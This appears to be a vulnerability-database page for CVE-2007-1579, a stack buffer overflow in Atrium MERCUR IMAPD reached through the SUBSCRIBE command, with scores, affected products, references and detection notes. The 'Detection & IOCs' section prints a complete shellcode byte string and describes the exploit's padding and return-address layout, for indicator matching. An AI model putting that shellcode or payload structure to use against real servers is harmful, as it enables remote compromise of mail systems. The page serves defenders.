CVE-2007-1579
published 2007-03-21CVE-2007-1579: Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
PriorityP265critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
56.21%
98.9th percentile
Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atrium_software | mercur_messaging_2005 | — | — |
| atrium_software | mercur_messaging_2005 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4\xa1\x39\xec\x83\xeb\xfc\xe2\xf4\x58\x49\x7d\xec\xa4\xa1\xb2\xa9\x98\x2a\x45\xe9\xdc\xa0\xd6\x67\xeb\xb9\xb2\xb3\x84\xa0\xd2\xa5\x2f\x95\xb2\xed\x4a\x90\xf9\x75\x08\x25\xf9\x98\xa3\x60\xf3\xe1\xa5\x63\xd2\x18\x9f\xf5\x1d\xe8\xd1\x44\xb2\xb3\x80\xa0\xd2\x8a\x2f\xad\x72\x67\xfb\xbd\x38\x07\x2f\xbd\xb2\xed\x4f\x28\x65\xc8\xa0\x62\x08\x2c\xc0\x2a\x79\xdc\x21\x61\x41\xe0\x2f\xe1\x35\x67\xd4\xbd\x94\x67\xcc\xa9\xd2\xe5\x2f\x21\x89\xec\xa4\xa1\xb2\x84\x98\xfe\x08\x1a\xc4\xf7\xb0\x14\x27\x61\x42\xbc\xcc\x51\xb3\xe8\xfb\xc9\xa1\x12\x2e\xaf\x6e\x13\x43\xc2\x54\x88\x8a\xc4\x41\x89\x84\x8e\x5a\xcc\xca\xc4\x4d\xcc\xd1\xd2\x5c\x9e\x84\xd9\x19\x94\x84\x8e\x78\xa8\xe0\x81\x1f\xca\x84\xcf\x5c\x98\x84\xcd\x56\x8f\xc5\xcd\x5e\x9e\xcb\xd4\x49\xcc\xe5\xc5\x54\x85\xca\xc8\x4a\x98\xd6\xc0\x4d\x83\xd6\xd2\x19\x94\x84\x8e\x78\xa8\xe0\xa1\x39\xec
- →Trigger is an IMAP SUBSCRIBE command sent after authentication; monitor for oversized SUBSCRIBE payloads on TCP/143 targeting Atrium MERCUR IMAPD. ↗
- →The exploit payload is padded with repeated 'L' bytes after the shellcode before the return address overwrite; large SUBSCRIBE payloads containing repetitive padding bytes are a strong indicator of exploitation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://secunia.com/advisories/24619http://www.immunitysec.com/partners-index.shtmlhttp://www.osvdb.org/33546http://www.securityfocus.com/bid/23050http://www.vupen.com/english/advisories/2007/1092https://exchange.xforce.ibmcloud.com/vulnerabilities/33216https://www.exploit-db.com/exploits/3537https://www.immunityinc.com/downloads/immpartners/MercurImapSubscribe.tarhttp://secunia.com/advisories/24619http://www.immunitysec.com/partners-index.shtmlhttp://www.osvdb.org/33546http://www.securityfocus.com/bid/23050http://www.vupen.com/english/advisories/2007/1092https://exchange.xforce.ibmcloud.com/vulnerabilities/33216https://www.exploit-db.com/exploits/3537https://www.immunityinc.com/downloads/immpartners/MercurImapSubscribe.tar
2007-03-21
Published